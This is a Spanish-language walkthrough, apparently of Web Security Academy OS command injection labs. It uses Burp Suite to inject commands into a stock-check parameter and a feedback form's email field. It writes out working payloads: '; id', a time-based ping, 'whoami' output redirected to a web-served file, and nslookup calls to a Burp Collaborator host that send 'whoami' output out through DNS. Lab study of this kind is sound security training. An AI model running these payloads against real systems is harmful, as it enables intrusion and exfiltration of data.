Lo mandamos al repeater donde podremos modificarlo y enviar el paquete. Usaremos la siguiente consulta:
productId=2&storeId=1 ; id
Interceptamos el envío del feedback con Burp suite.
Probamos en los parametros en cual funciona agregarle ||ping+-c+10+127.0.0.1||
, el que funciona es el parametro email.
...
csrf=AH3gDeLKQ9z9wuUelG8ExXglulKqw6Bt&name=Gatoto&email=gato@gmail.com||ping+-c+10+127.0.0.1||&subject=adfsad&message=asdfasd
El resultado debería demorar por lo menos 10 segundos.
Interceptamos el paquete al enviar el feedback como el laboratorio anterior pero esta vez enviamos el resultado a la carpeta /var/www/images
. Guardaremos la respuesta en un txt.
...
csrf=v8X6Ld2i21GljQMqjB9CKjDzrCqpSrhO&name=asdfasd&email=gato%40gmail.com||whoami>/var/www/images/miau.txt||&subject=asdas&message=asdasd
Ahora podremos ver el resultado en https://acad1f931ec1c55bc03570a8007f0058.web-security-academy.net/image?filename=miau.txt
.
Interceptamos la consulta igual que los anteriores laboratorios.
Usaremos el Burp Collaborator Client para recepcionar las consultas externas.
Presionamos la opción de copy to clipboard
, en nuestro caso nos copio la dirección 5x3n5ni2nt8kgaozaa78zab4mvsmgb.burpcollaborator.net
.
...
csrf=S1bia6kmPluBfw6osSYf7l0Q4ieyFGDt&name=asdf&email=gato%40gmail.com||nslookup+5x3n5ni2nt8kgaozaa78zab4mvsmgb.burpcollaborator.net||&subject=asdfsdf&message=asdfsad
Obtenemos los resultados en el burp collaborator.
...
csrf=j0THGLFofHZKTMBkm5YE3ZTfkaTTSiQT&name=asdfas&email=gato%40gmail.com||nslookup+`whoami`.zsv3zamskchm3cmvtmioea5h187yvn.burpcollaborator.net||&subject=asdfasdf&message=asdfasd